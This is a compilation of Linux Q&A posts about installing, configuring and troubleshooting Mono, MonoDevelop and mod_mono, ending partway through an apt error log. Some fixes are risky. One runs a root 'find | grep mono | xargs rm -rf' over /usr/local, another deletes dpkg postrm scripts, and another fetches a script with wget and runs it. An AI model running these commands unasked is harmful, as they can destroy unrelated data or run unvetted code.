I installed MonoDevelop because I know of its support for WinForms, but when I try opening the .sln file it opens it in a text editor in MonoDevelop rather than as a solution. I have two major solutions I need to develop: Yahtzee and GemsCraft.
How do I open these solutions in MonoDevelop? Yahtzee is in Visual Basic and GemsCraft is in C#.
| How to Open Visual Studio 2013 Solution in MonoDevelop |
Most of this comes from http://wiki.phonicuk.com/Installing-Mono-in-CentOS-5-x.ashx
1) Satisfy the dependencies before compiling mono
wget http://dl.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm
rpm -Uvh epel-release-6-8.noarch.rpm
yum install bison gettext glib2 freetype fontconfig libpng libpng-devel \
libX11 libX11-devel glib2-devel libgdi* libexif glibc-devel urw-fonts \
java unzip gcc gcc-c++ automake autoconf libtool make bzip2 wget
2) compile mono
cd ~
wget http://download.mono-project.com/sources/mono/mono-2.10.8.tar.gz
tar zxvf mono-2.10.8.tar.gz
cd mono-2.10.8
./configure --prefix=/usr/local
make
3) install mono
make install |
Does anyone know how to install Mono and MonoDevelop on a Redhat 6.5 Workstation?
I've tried a number of different things but nothing has worked. I tried using git and building with make from the mono website but it didn't build.
| Install mono and Monodevelop on a new Redhat 6.5 Workstation |
{
my-mono-app 2>&1 >&3 3>&1 | awk '
{print}
/ref unused/ {print "Exiting."; exit(1)}' >&2
} 3>&1
awk would exit as soon as it reads one of those messages, causing my-mono-app to be killed by a SIGPIPE the next time it tries to write something on stderr.
Don't use mawk there which buffers stdin in a stupid way (or use -W interactive there).
If the application doesn't die on SIGPIPE, you'll have to kill it in some way.
One way could be:
{ sh -c 'echo "$$" >&2; exec my-mono-app' 2>&1 >&3 3>&1 | awk '
NR == 1 {pid = $0; next}
{print}
/ref unused/ && ! killed {
print "Killing",pid
killed=1
system("kill " pid)
}' >&2
} 3>&1
Replace "kill " with "kill -s KILL " if it still doesn't work.
|
I have a task that runs written in Mono, however sometimes (randomly) the Mono runtime will hang after the task is complete and just print:
_wapi_handle_ref: Attempting to ref unused handle 0x2828
_wapi_handle_unref_full: Attempting to unref unused handle 0x2828
_wapi_handle_ref: Attempting to ref unused handle 0x2828
_wapi_handle_unref_full: Attempting to unref unused handle 0x2828
...to stderr forever. Is there a way of parsing stderr and killing the task when a certain pattern is matched?
A timeout is out of the question because the task can legitimately take upwards of an hour to complete normally, but if there is no work to be done will exit instantly (or at least it's supposed to).
| Stop a task based on output |
Easiest way to install .NET 4.0 is to use the newest Winetricks script:
$ wget https://raw.githubusercontent.com/Winetricks/winetricks/master/src/winetricks
$ sh winetricks dotnet40
Also, if you have 64-bit wine installed, you will need to use the newer .NET 4.5 (dotnet45) instead of 4.0.
|
I am using fedora 23 and I want to install .NET framework 4 in wine.
Based on this, I have to remove Mono first. But when I run the following command I get an unsuccessful result.
$ wine uninstaller --remove '{E45D8920-A758-4088-B6C6-31DBB276992E}'
fixme:ntdll:find_reg_tz_info Can't find matching timezone information in the registry for bias -210, std (d/m/y): 22/09/2015, dlt (d/m/y): 22/03/2015
fixme:winediag:start_process Wine Staging 1.7.55 is a testing version containing experimental patches.
fixme:winediag:start_process Please mention your exact version when filing bug reports on winehq.org.
fixme:ntdll:find_reg_tz_info Can't find matching timezone information in the registry for bias -210, std (d/m/y): 22/09/2015, dlt (d/m/y): 22/03/2015
fixme:ntdll:find_reg_tz_info Can't find matching timezone information in the registry for bias -210, std (d/m/y): 22/09/2015, dlt (d/m/y): 22/03/2015
fixme:ntdll:find_reg_tz_info Can't find matching timezone information in the registry for bias -210, std (d/m/y): 22/09/2015, dlt (d/m/y): 22/03/2015
fixme:ntdll:find_reg_tz_info Can't find matching timezone information in the registry for bias -210, std (d/m/y): 22/09/2015, dlt (d/m/y): 22/03/2015
fixme:ntdll:find_reg_tz_info Can't find matching timezone information in the registry for bias -210, std (d/m/y): 22/09/2015, dlt (d/m/y): 22/03/2015
fixme:ntdll:find_reg_tz_info Can't find matching timezone information in the registry for bias -210, std (d/m/y): 22/09/2015, dlt (d/m/y): 22/03/2015
uninstaller: The application with GUID '{E45D8920-A758-4088-B6C6-31DBB276992E}' was not found
Removing the wine-mono package removes the main wine packages too.
Please tell me how I can remove Mono.
| How to install wine with .NET framework instead of mono? |
MonoServerPath example.com "/usr/bin/mod-mono-server4"
should probably be
MonoServerPath mydomain.org "/usr/bin/mod-mono-server4" |
I know I'm running mono-apache-server4 but when I launch the site mono-apache-server2 is responding.
Why is my site not using 4.0?
See htop:This is what I did:
Installed Debian Wheezy along with apache and mod-mono:
apt-get install mono-apache-server2 mono-apache-server4 libapache2-mod-mono libmono-i18n2.0-cilThen I edited the default virtual host file: sudo nano /etc/apache2/sites-available/default
<VirtualHost *:80>
ServerName mydomain.org
ServerAdmin [emailprotected]
ServerAlias www.mydomain.org
DocumentRoot /var/www/mydomain.org/
ErrorLog /var/www/logs/mydomain.org.error.log
CustomLog /var/www/logs/mydomain.org.access.log combined
MonoServerPath example.com "/usr/bin/mod-mono-server4"
MonoDebug mydomain.org true
MonoSetEnv mydomain.org MONO_IOMAP=all
MonoApplications mydomain.org "/:/var/www/mydomain.org/"
<Location "/">
Allow from all
Order allow,deny
MonoSetServerAlias mydomain.org
SetHandler mono
SetOutputFilter DEFLATE
SetEnvIfNoCase Request_URI "\.(?:gif|jpe?g|png)$" no-gzip dont-vary
</Location>
<IfModule mod_deflate.c>
AddOutputFilterByType DEFLATE text/html text/plain text/xml text/javascript
</IfModule>
</VirtualHost>And restarted apache2:Update:
I reinstalled using:
apt-get install mono-apache-server4 libapache2-mod-mono libmono-i18n4.0-all
But Jim's answer was the culprit.
| apache virtualhost using mono-apache-server2 not mono-apache-server4 |
No, Paint.NET will not run on Mono.
There was some (currently abandoned) effort to port it to non-Windows systems.
Also, it has inspired Pinta, a project which is supposed to be drop-in replacement for Paint.NET on non-Windows systems.
|
I tried downloading and running the Paint.NET installer under mono and got:
Cannot open assembly 'Paint.NET.3.5.8.Install.exe':
File does not contain a valid CIL image.
Can this be installed using mono?
If it matters, I'm running Ubuntu.
| Can I install Paint.Net on linux using mono? |
As hinted by https://packages.qa.debian.org/m/mod-mono/news/20140104T163913Z.html, the problem was https://bugs.debian.org/731374, which is fixed in unstable, in version 3.8-1, as you can see at the end of the bug thread. So if you want to use the unstable version on Jessie, you can. No reason not to.
In case it isn't obvious, the bug was not fixed in time before the freeze, so therefore this package was removed from Jessie and not reinstated in time.
However, note that
(a) you probably want to use all the binary packages corresponding to the xsp source package
(b) depending on ABI changes, you may need to rebuild them on your Jessie system.
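For (b), a hedged sketch of pulling the source package from unstable and rebuilding it locally (assumes a deb-src entry for sid in your sources.list; package name taken from the answer above):
apt-get source xsp/unstable      # fetch the source package
sudo apt-get build-dep xsp       # install its build dependencies
cd xsp-*/
dpkg-buildpackage -us -uc        # build unsigned .deb files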
|
I would like to run an ASP.net MVC application that requires Mono 4 on Debian Jessie, but Jessie is missing the required package "libapache2-mod-mono" [1]. On [2] I found that the package was removed from Jessie some time ago (2014-01-04), according to [3] because a file named "mono.load" is missing (in Wheezy (stable) and sid (unstable), the required file has the name "mod_mono.load" and at least in Wheezy that works).
Which way should I go now in order to get that issue solved? Should I install libapache2-mod-mono etc. from sid (unstable), similar to [4]? Is it wise to download and compile that package and then put the output files on a production system? Or is there a way I can help out and get libapache2-mod-mono back into Jessie? Should I possibly report the problem to someone?
[1] https://packages.debian.org/search?keywords=libapache2-mod-mono
[2] https://packages.qa.debian.org/m/mod-mono.html
[3] https://lintian.debian.org/maintainer/[emailprotected]#mod-mono
[4] How to install a single Jessie package on Wheezy?
| How to run mod_mono on Debian Jessie (package libapache2-mod-mono missing)? |
Okay, it works. I don't have a very precise answer to the exact question of why the autostart did not work, other than noting the difference: the .sh file does not work, while calling the application directly does.
What I did now:
After deleting the old .desktop files in the autostart folder, I created this one:
$ nano ~/.config/autostart/MyAppName.desktop
Inserted this:
[Desktop Entry]
Exec=mono /full/path/to/mono_c#/gui/app/myappname.exe
Path=/full/path/to/working/directory
Name=MyAppName
Type=Application
Version=1.0
Note: the executable here for "Exec", found via the path variable, is mono, and its command line arg is the path to the "executable" which runs on the mono framework.
This works as supposed. Reboot -> app starts.
Edit: Note that for me, the app did not have the working directory assigned by Path, probably an error on my side somewhere, but I'll mention it, just in case.
Now I would have liked some things to be done in the original .sh file that refuses to work here. So I won't "accept" my own answer for a while, in case somebody comes along who can tell precisely what's going on.
Edit - some refs:
https://wiki.archlinux.org/index.php/Desktop_entries#File_example
https://specifications.freedesktop.org/desktop-entry-spec/desktop-entry-spec-latest.html#recognized-keys
|
I have a BeagleBone Black here,
running Debian 8.3, Linux 4.1.15-ti-rt-r43.
Desktop is LXQT.
After boot, I want to run a .sh file - when the desktop environment is ready, as that file, after changing path and setting some variables, calls mono to start a GUI based program.
Using the "start menu":
Preferences -> LXQt settings -> Sessions settings
-> Autostart
I added an entry, first under "Global Autostart", later under "LXQt Autostart" (only one of the two boxes checked at a time). I specified, under "command", the path to my .sh script, via the "Search..." button, i.e. no mistyping possible.
I tried it with both, "Wait for system tray" checked, and unchecked.
Hit "close", and rebooted the machine via start menu each try.
After the desktop starts, nothing else happens.
The script does run fine from ssh remote* command prompt, though - the app starts.
Also, copying it to the Desktop and clicking it - works.
* the .sh file contains the line "export DISPLAY=:0" as it was originally used via ssh to start a GUI app.
I commented it out to see if that changes anything here; it doesn't.
EDIT:
So I have now manually crafted a .desktop file in ~/.config/autostart - noting the .desktop files LXQt made in that folder by me clicking around in the UI as described above. In my file, I specified the paths etc to start my .sh script, and set one extra option to true: "Terminal", which specifies the autostart program should be run in a terminal.
What this did was to show me - yes indeed, something gets started after boot / loading desktop env, because the terminal is visible, i.e. my autostart file is not ignored.
But the "echo" commands in my .sh script do not show up on that terminal, nor is my mono application started.
If I then open another remote shell, and copy+paste the path I gave in the autostart .desktop file under "Exec", it does start my app as expected - so the path is correct.
So, what's happening there? The LXQt desktop obviously finds my file, tries to autostart, but it doesn't do anything.
Possible causes?
I thought (not really knowing how this all works under the hood) that perhaps mono/the GUI isn't ready yet for some funny reason, even though the desktop loaded, so I put an echo "sleeping...", sleep 30s, echo "calling mono app..." before calling the mono app in my .sh file that's supposed to autostart.
None of this is visible in the terminal that does now open upon start, and it doesn't help.
| Why does LXQT Autostart not do anything? |
From the page at http://www.go-mono.com/mono-downloads/download.html, it seems like they used to have downloads for other distros for 2.10.x, under "Other"; however, it is stated that those are supported by their own communities. My guess would be that the third parties packaging Mono 2.10.x for Ubuntu and Debian have not submitted the packages to Mono.
Also, Mono was formerly developed by Novell which bought the SUSE brands and trademarks, which is what OpenSUSE is based on, and is possibly why Mono supports SUSE in particular.
|
The Mono download page has a download for OpenSuse but not any other version of Linux. Why is that, is OpenSuse better suited for Mono for some reason than say Ubuntu?
We're developing on Macs using 3.2.5 and currently deploying to an Ubuntu (12.04) server using Mono 2.10, and we notice some differences, especially artifacts in ServiceStack's Razor engine, but it's otherwise mostly OK. I tried installing 3.2.4 the long way around, however the site just crashes on Ubuntu, so I had to roll that back to 2.10.
I now need to rebuild the server anyway and would like to know if OpenSuse is the better image for us to use this time...?
| Why is Mono 3.x available specifically for OpenSuse and not other Linux (like Ubuntu) |
It looks like you've built and installed monodevelop from source - did you do the same for the dependencies like gtksharp? Since banshee and tomboy are broken, it sounds like you have a dependency shared between the broken programs, and that's an obvious candidate. Do CLI mono apps work?
From the MonoDevelop build documentation:
We strongly recommend you install everything from packages if possible. If not, you should use a Parallel Mono Environment. Do not install anything to /usr or /usr/local unless you completely understand the implications of doing so.
If the other mono applications will only run from the installed monodevelop tree, and reinstalling packages hasn't helped, you might have a mess of extra stuff floating around that the source install has added which is interfering with mono finding its libraries, possibly with hardcoded paths into the monodevelop install.
My Debian-fu is not strong, but there should be a way of identifying files in /usr that dpkg doesn't know about, that might be a place to start.
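A hedged sketch of that idea (slow, but it lists files under /usr that no installed package claims; the scope and output format are just an example):
find /usr -xtype f | while read -r f; do
    dpkg -S "$f" > /dev/null 2>&1 || echo "unclaimed: $f"
done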
|
If I want to run the application monodevelop, I need to chdir to /usr/lib/monodevelop/Bin and then execute ./MonoDevelop.exe. This is the same for all other Mono applications such as banshee, tomboy, etc.
If I attempt to run the Mono applications from another location by simply running monodevelop, or even from their own directory, I get TypeInitializationExceptions like this:
behrooz@behrooz:/usr/lib/monodevelop/bin$ monodevelop
FATAL ERROR [2012-05-04 11:24:39Z]: MonoDevelop failed to start. Some
of the assemblies required to run MonoDevelop (for example gtk-sharp,
gnome-sharp or gtkhtml-sharp) may not be properly installed in the
GAC. System.TypeInitializationException: An exception was thrown by
the type initializer for Gtk.Application --->
System.EntryPointNotFoundException: glibsharp_g_thread_supported at
(wrapper managed-to-native) GLib.Thread:glibsharp_g_thread_supported
() at GLib.Thread.get_Supported () [0x00000] in :0
at Gtk.Application..cctor () [0x00000] in :0 ---
End of inner exception stack trace --- at
MonoDevelop.Ide.IdeStartup.Run (MonoDevelop.Ide.MonoDevelopOptions
options) [0x0007e] in
/home/behrooz/Desktop/Monodevelop/monodevelop-2.8.6.5/src/core/MonoDevelop.Ide/MonoDevelop.Ide/IdeStartup.cs:95
at MonoDevelop.Ide.IdeStartup.Main (System.String[] args) [0x0004f] in
/home/behrooz/Desktop/Monodevelop/monodevelop-2.8.6.5/src/core/MonoDevelop.Ide/MonoDevelop.Ide/IdeStartup.cs:503
Why is that?
I have tried reinstalling all Mono, Wine, GTK, Glib, X, Gnome packages.
apt-get --purge --reinstall install $(dpkg --get-selections | grep mono | grep install | grep -v deinstall | awk '{print $1}')
I also tried strace on "open" and got nothing by myself.
System Configuration:
Debian 6.0-updates 64 bit
Kernel 3.2.0-2, 3.2.0-1, 3.1 and 3 EDIT: not a kernel thing
Gnome 3.4 EDIT:but a gnome thing
Mono 2.10.5
TLS: __thread
SIGSEGV: altstack
Notifications: epoll
Architecture: amd64
Disabled: none
Misc: softdebug
LLVM: supported, not enabled.
GC: Included Boehm (with typed GC and Parallel Mark)
Update: after upgrading to the new MonoDevelop 3.0.2 and the latest Mono, I can run MonoDevelop with the command monodevelop in a terminal, no chdir. But gnome-shell cannot run it.
Finally found it:
as root:
cd /usr/local/
find | grep mono | xargs rm -rf
# Use with caution/some applications may get messed up (stellarium has MONOchrome images...)
| Why do Mono applications only start from their own directory?
I was very impatient and felt that the package mono-2.0-devel might have mkbundle. So I went ahead and installed mono-2.0-devel which needed only 18 additional packages. When I typed mkb and hit tab, it showed me mkbundle2.
I tried:
$ mkbundle2 -o hello hello.exe --deps
OS is: Linux
Sources: 1 Auto-dependencies: True
embedding: /home/minato/Projects/Practice/mono/hello.exe
embedding: /usr/lib/mono/2.0/mscorlib.dll
Compiling:
as -o temp.o temp.s
cc -ggdb -o hello -Wall temp.c `pkg-config --cflags --libs mono` temp.o
Done$ ls
hello hello.cs hello.e hello.exe$ ./hello
Hello from Mono!This was what I needed in the first place.
Thanks to the command-not-found tool.
|
A C# file in mono can be compiled using gmcs command. This will create a hello.exe file.
$ gmcs hello.cs
$ ls
hello.cs hello.exe
$ ./hello.exe
Hello from Mono!
To generate a Linux executable, I tried this command, but it generates an error:
$ gmcs /t:exe hello.cs /out:hello
Unhandled Exception: System.ArgumentException: Module file name 'hello' must have file extension.
$ ./hello
Hello from Mono!I searched and found a solution which mentions of a tool called mkbundle:
$ mkbundle -o hello hello.exe --deps
Sources: 1 Auto-dependencies: True
embedding: /home/ed/Projects/hello_world/hello.exe
embedding: /mono/lib/mono/1.0/mscorlib.dll
Compiling:
as -o /tmp/tmp54ff73e6.o temp.s
cc -o hello -Wall temp.c `pkg-config --cflags --libs mono` /tmp/tmp54ff73e6.o
Done$ ls -l
total 3
-rwxr-xr-x 1 ed users 1503897 2005-04-29 11:07 hello
-rw-r--r-- 1 ed users 136 2005-04-29 11:06 hello.cs
-rwxr-xr-x 1 ed users 3072 2005-04-29 11:06 hello.exe
This utility does not seem to exist in my Mono install. I found that it is available in the mono-devel package. Installing that package would mean installing around 82 other packages. My goal was to keep my Mono install minimal for now.
Is there a way to install mkbundle standalone?
| Generating a Linux executable with Mono with mkbundle |
In mod-mono's configuration file you must set MonoServerPath to mod-mono-server4 as explained here.
|
I have an OpenSuse Linux server and want to run an ASP.net web project. I have installed the apache2 module mod-mono, but when I try to access the ASP web pages it looks as if it is attempting to use .Net 2 when the project is built under .Net 4.
How can I change it to use .Net 4?
| Enable .Net 4 Mono on OpenSuse |
Using the Java example from http://wiki.linuxhelp.net/index.php/Nano_Syntax_Highlighting, you can try to add something like the following into your ~/.nanorc:
syntax "C# source" "\.cs$"
color green "\<(bool|byte|sbyte|char|decimal|double|float|int|uint|long|ulong|new|object|short|ushort|string|base|this|void)\>"
color red "\<(as|break|case|catch|checked|continue|default|do|else|finally|fixed|for|foreach|goto|if|is|lock|return|switch|throw|try|unchecked|while)\>"
color cyan "\<(abstract|class|const|delegate|enum|event|explicit|extern|implicit|in|internal|interface|namespace|operator|out|override|params|private|protected|public|readonly|ref|sealed|sizeof|static|struct|typeof|using|virtual|volatile)\>"
color red ""[^\"]*""
color yellow "\<(true|false|null)\>"
color blue "//.*"
color blue start="/\*" end="\*/"
color brightblue start="/\*\*" end="\*/"
color brightgreen,green " +$" |
Has anyone got (or can point in the direction of) a nanorc file that contains syntax highlighting for C# and/or ASP.Net?
| Nano syntax highlighting for C# and/or ASP. Net |
Enable the mod_mono control panel.
In httpd.conf, add
<Location /mono>
SetHandler mono-ctrl
Order deny,allow
Deny from all
Allow from 127.0.0.1
</Location>
You will need to modify the addresses that can access it in the Allow from line.
Reload httpd and now you can go to http://some.website.domain/mono. You can, among other things, reload all or individual mono applications.
|
Is there any way to restart ONE web application in mono without having to restart Apache?
Currently I'm doing a sudo service apache2 restart every time I deploy my .NET web application to Mono, but it restarts all my other applications, requiring them ALL to get reloaded into memory at the next web request.
| How to restart mono web application without restarting apache? |
There are a good number of programs that use mono in Ubuntu if you look at the whole repository. In the default install, I believe the following are the only mono apps:
f-spot
gbrainy
tomboy
There may be more; I just made this list by looking at which applications would be removed if I removed libmono*. However, even just having these means that a good portion of the mono framework is installed by default, which makes it very easy to deploy mono apps onto Ubuntu. A few very popular Ubuntu applications are written in mono, including gnome-do, Banshee, and docky. The trend I've seen from the sidelines is that despite its detractors, mono is gaining a lot of ground with desktop application authors because of the speed at which one can develop fairly rich GUI apps with the monodevelop IDE.
|
I think Mono, and the C# language, are a great, nay, fantastic project.
My question is: how prevalent is Mono in Ubuntu? How much of a penetration is it getting, and what applications run on it?
| Applications that run on Mono in Ubuntu |
There are a couple of approaches to try.
The first is to fix /usr/share/cli-common/policy-remove so it doesn’t fail if the policy is absent: edit its last line so that it runs rm -f instead of rm. That should allow the packages to be removed correctly.
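A hedged sketch of that edit, assuming the script's last line invokes rm directly as described (inspect the file before and after, and keep a backup):
sudo cp /usr/share/cli-common/policy-remove /usr/share/cli-common/policy-remove.bak
sudo sed -i '$ s/\brm\b/rm -f/' /usr/share/cli-common/policy-remove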
If that fails, and since you’re trying to remove all the Mono packages, it should be safe enough to remove the failing postrm scripts:
sudo rm /var/lib/dpkg/info/lib{glade,glib,gtk}2.0-cil.postrmThe only operation the postrm scripts do is unregister the policies, which you don’t care about since you’re removing everything anyway.
You’re not the only person to have suffered from this issue: it was reported in 2012 as Debian bug 692962.
|
I was installing some packages and during the install of one, the system hung and the package was not installed. But the package was added to the list of installed packages. So I restarted the system and tried the following:
When I try to remove the package, it doesn't work because it can't find a config file.
When I try to install the package, it says the package is already installed, and therefore won't install it
When I try to update, it tries to remove the package, and encounters the error above.
So my question is: is there a way to manually remove a package from the list of installed packages, or is there another way to solve this problem?
When I run: sudo apt-get upgrade
Error is:
Reading package lists... Done
Building dependency tree
Reading state information... Done
Calculating upgrade... Done
The following packages will be REMOVED:
libglade2.0-cil libglib2.0-cil libgtk2.0-cil
0 upgraded, 0 newly installed, 3 to remove and 0 not upgraded.
18 not fully installed or removed.
After this operation, 2,819 kB disk space will be freed.
Do you want to continue? [Y/n] Y
(Reading database ... 119043 files and directories currently installed.)
Removing libglade2.0-cil (2.12.26-0xamarin1) ...
E: File does not exist: /usr/share/cli-common/packages.d/policy.2.8.glade-sharp.installcligac
dpkg: error processing package libglade2.0-cil (--remove):
subprocess installed post-removal script returned error exit status 1
Removing libgtk2.0-cil (2.12.26-0xamarin1) ...
E: File does not exist: /usr/share/cli-common/packages.d/policy.2.6.gtk-dotnet.installcligac
dpkg: error processing package libgtk2.0-cil (--remove):
subprocess installed post-removal script returned error exit status 1
Removing libglib2.0-cil (2.12.26-0xamarin1) ...
E: File does not exist: /usr/share/cli-common/packages.d/policy.2.6.glib-sharp.installcligac
dpkg: error processing package libglib2.0-cil (--remove):
subprocess installed post-removal script returned error exit status 1
Errors were encountered while processing:
libglade2.0-cil
libgtk2.0-cil
libglib2.0-cil
E: Sub-process /usr/bin/dpkg returned an error code (1) | Unable to remove CLI library packages |
If you were getting this error on an install operation then a likely cause would be that your local database of available packages doesn't match what's available on the server, so APT is requesting package versions that don't exist anymore. The fix in that case is to run apt-get update to update the local availability database. However I don't see how this could happen on a remove or purge operation.
It's possible that the APT database was in a transitional state with unresolved dependencies. APT can't cope with unresolved dependencies so the first thing it needs to do, even on a removal operation, is to fix those dependencies. Try running apt-get -f install to get into a consistent state without changing what APT considers to be the desired state, before you make changes to the desired state such as requesting the installation or removal of a package.
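Putting the two suggestions together, a hedged sequence for this situation:
sudo apt-get update          # refresh the local availability database
sudo apt-get -f install      # let APT repair unresolved dependencies first
sudo apt-get purge mono-devel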
|
After I ran sudo apt-get install mono-devel, when I try to purge mono-devel on Ubuntu Linux 16.04, I get the following error message:
Reading package lists... Done
Building dependency tree
Reading state information... Done
Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.
The following information may help to resolve the situation:The following packages have unmet dependencies:
mono-devel : Depends: mono-runtime (>= 2.10.1) but it is not installable
Depends: libmono-cecil-private-cil (>= 2.6.3) but it is not going to be installed
Depends: libmono-codecontracts4.0-cil (>= 1.0) but it is not going to be installed
Depends: libmono-compilerservices-symbolwriter4.0-cil (>= 1.0) but it is not going to be installed
Depends: libmono-corlib2.0-cil (>= 2.6.3) but it is not going to be installed
Depends: libmono-corlib4.0-cil (>= 2.10.1) but it is not going to be installed
Depends: libmono-peapi2.0-cil (>= 2.4.2) but it is not going to be installedWhy does this error occur and how can I fix it?
Also, is it necessary to install mono-devel on a production system? I understand that mono-devel contains various development tools and pulls in the default development stack for Mono.
We may be using mono-devel for C#/ASP.NET webforms compilation and development.
[EDIT June 13 2016 7:46AM] This morning I ran sudo apt-get -f install followed by sudo apt-get remove mono-devel. Here is the resulting error message:
vanhuys@udel-ThinkStation-S10:~$ sudo apt-get remove mono-devel
Reading package lists... Done
Building dependency tree
Reading state information... Done
Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.
The following information may help to resolve the situation:
The following packages have unmet dependencies:
libapache2-mod-mono : Depends: mono-apache-server (>= 4.2) but it is not going to be installed or
mono-apache-server4 (>= 4.2) but it is not going to be installed
Depends: mono-apache-server (< 4.4) but it is not going to be installed or
mono-apache-server4 (< 4.4) but it is not going to be installed
E: Error, pkgProblemResolver::Resolve generated breaks, this may be caused by held packages.
| Why I cannot purge mono-devel on Ubuntu Linux 16.04? |
Linphone's mediastream requires CTRL+C (SIGINT) to close properly, and killall's default signal is SIGTERM. So you can try sending the SIGINT signal with the killall command as follows:
killall -SIGINT mediastream
or
killall -2 mediastream |
I am running my donnet framework based application using mono in Linux Ubuntu. My application uses linphone's mediastream command to open the RTP socket and hook the audio device.
I am using the following mediastream command to call from my application:
mediastream (arguments......)
Everything is working fine, but when I try to kill mediastream using the killall command, it goes defunct. I am issuing the following command from my application:
killall mediastream
What am I doing wrong? How can I handle those defunct processes?
| Mediastream goes defunct |
I encountered the same problem today and this worked for me (I'm running Armbian on a Pine64):
mv /etc/mono/config.dpkg-new /etc/mono/config
followed by
apt install ca-certificates-mono
I got the solution from over here:
|
I wanted to upgrade my packages on my Raspberry Pi, so I successfully ran an apt-get update.
After that, I obviously wanted to do an apt-get upgrade, but I got an error.
Reading package lists... Done
Building dependency tree
Reading state information... Done
You might want to run 'apt --fix-broken install' to correct these.
The following packages have unmet dependencies:
mono-devel : Depends: ca-certificates-mono (= 6.0.0.319-0xamarin1+raspbian9b1) but 5.12.0.226-0xamarin3+raspbian9b1 is installed
E: Unmet dependencies. Try 'apt --fix-broken install' with no packages (or specify a solution).Like it's recommanded, I did an apt --fix-broken install, but I've got a bunch of errors because of that.
Reading package lists... Done
Building dependency tree
Reading state information... Done
Correcting dependencies... Done
The following packages were automatically installed and are no longer required:
libmono-system-runtime-interopservices-runtimeinformation4.0-cil libnunit-cil-dev libnunit-console-runner2.6.3-cil libnunit-core-interfaces2.6.3-cil libnunit-core2.6.3-cil libnunit-framework2.6.3-cil libnunit-mocks2.6.3-cil
libnunit-util2.6.3-cil libpng12-0
Use 'sudo apt autoremove' to remove them.
The following additional packages will be installed:
ca-certificates-mono
The following packages will be upgraded:
ca-certificates-mono
1 upgraded, 0 newly installed, 0 to remove and 89 not upgraded.
171 not fully installed or removed.
Need to get 0 B/31.2 kB of archives.
After this operation, 6,144 B of additional disk space will be used.
Do you want to continue? [Y/n]
Reading changelogs... Done
Setting up mono-gac (6.0.0.319-0xamarin1+raspbian9b1) ...
* Installing 1 assembly from libnunit-console-runner2.6.3-cil into Mono
Unhandled Exception:
System.DllNotFoundException: System.Native
at (wrapper managed-to-native) Interop+Sys.Stat(byte&,Interop/Sys/FileStatus&)
at Interop+Sys.Stat (System.ReadOnlySpan`1[T] path, Interop+Sys+FileStatus& output) [0x00028] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath, System.Int32 fileType, Interop+ErrorInfo& errorInfo) [0x00007] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath) [0x00006] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.File.Exists (System.String path) [0x00043] in <15c986724bdc480293909469513cfdb3>:0
at Mono.Tools.Driver.LoadConfig (System.Boolean quiet) [0x00028] in <037438e7c61a4834974bb2bb24951222>:0
at Mono.Tools.Driver.Main (System.String[] args) [0x00351] in <037438e7c61a4834974bb2bb24951222>:0
[ERROR] FATAL UNHANDLED EXCEPTION: System.DllNotFoundException: System.Native
at (wrapper managed-to-native) Interop+Sys.Stat(byte&,Interop/Sys/FileStatus&)
at Interop+Sys.Stat (System.ReadOnlySpan`1[T] path, Interop+Sys+FileStatus& output) [0x00028] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath, System.Int32 fileType, Interop+ErrorInfo& errorInfo) [0x00007] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath) [0x00006] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.File.Exists (System.String path) [0x00043] in <15c986724bdc480293909469513cfdb3>:0
at Mono.Tools.Driver.LoadConfig (System.Boolean quiet) [0x00028] in <037438e7c61a4834974bb2bb24951222>:0
at Mono.Tools.Driver.Main (System.String[] args) [0x00351] in <037438e7c61a4834974bb2bb24951222>:0
E: installing Assembly /usr/lib/cli/nunit-console-runner-2.6.3/nunit-console-runner.dll failed
E: Installation of libnunit-console-runner2.6.3-cil with /usr/share/cli-common/runtimes.d/mono failed
* Installing 1 assembly from libnunit-core2.6.3-cil into MonoUnhandled Exception:
System.DllNotFoundException: System.Native
at (wrapper managed-to-native) Interop+Sys.Stat(byte&,Interop/Sys/FileStatus&)
at Interop+Sys.Stat (System.ReadOnlySpan`1[T] path, Interop+Sys+FileStatus& output) [0x00028] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath, System.Int32 fileType, Interop+ErrorInfo& errorInfo) [0x00007] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath) [0x00006] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.File.Exists (System.String path) [0x00043] in <15c986724bdc480293909469513cfdb3>:0
at Mono.Tools.Driver.LoadConfig (System.Boolean quiet) [0x00028] in <037438e7c61a4834974bb2bb24951222>:0
at Mono.Tools.Driver.Main (System.String[] args) [0x00351] in <037438e7c61a4834974bb2bb24951222>:0
[ERROR] FATAL UNHANDLED EXCEPTION: System.DllNotFoundException: System.Native
at (wrapper managed-to-native) Interop+Sys.Stat(byte&,Interop/Sys/FileStatus&)
at Interop+Sys.Stat (System.ReadOnlySpan`1[T] path, Interop+Sys+FileStatus& output) [0x00028] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath, System.Int32 fileType, Interop+ErrorInfo& errorInfo) [0x00007] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.FileSystem.FileExists (System.ReadOnlySpan`1[T] fullPath) [0x00006] in <15c986724bdc480293909469513cfdb3>:0
at System.IO.File.Exists (System.String path) [0x00043] in <15c986724bdc480293909469513cfdb3>:0
at Mono.Tools.Driver.LoadConfig (System.Boolean quiet) [0x00028] in <037438e7c61a4834974bb2bb24951222>:0
at Mono.Tools.Driver.Main (System.String[] args) [0x00351] in <037438e7c61a4834974bb2bb24951222>:0
E: installing Assembly /usr/lib/cli/nunit.core-2.6.3/nunit.core.dll failed
E: Installation of libnunit-core2.6.3-cil with /usr/share/cli-common/runtimes.d/mono failed
* Installing 1 assembly from libnunit-core-interfaces2.6.3-cil into MonoUnhandled Exception:
